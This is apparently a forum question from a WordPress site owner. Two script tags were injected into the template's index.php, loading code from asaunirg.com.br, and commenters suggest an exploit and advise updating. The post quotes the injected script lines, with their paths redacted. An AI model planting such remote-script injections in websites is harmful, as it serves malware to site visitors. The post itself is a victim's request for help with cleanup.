# Wordpress malware script injection asaunirg.com.br facesta.com.br 0day.php

Tags: wordpress, iframe, applet, malware

Something modified the index.php of my template to add this two lines of code before the  tag (I deleted some part of the script for security reasons).

```
<script type="text/javascript" src="http://asaunirg.com.br/******"></script>
<script type="text/javascript" src="http://asaunirg.com.br/******"></script>
```

They open two iframes, a java applet and add a few scripts to the . Along with asaunirg.com.br it tries to connect to another site called facesta.com.br.

I solved it deleting the first two lines (the malicious scripts shown above) in the index.php file at my template folder. Does anyone have a clue of how could this malicious code be injected to my website?

Comment: An exploit. Are you running the latest version of WordPress? In a shared environment or in your own server?

Comment: I have my own IP and the site is hosted in a vps. I'm not runnning the latest worpress version but i have wp 3.3.

Comment: Try to read Apache log and post something significant here for us to investigate... However, update your WordPress now.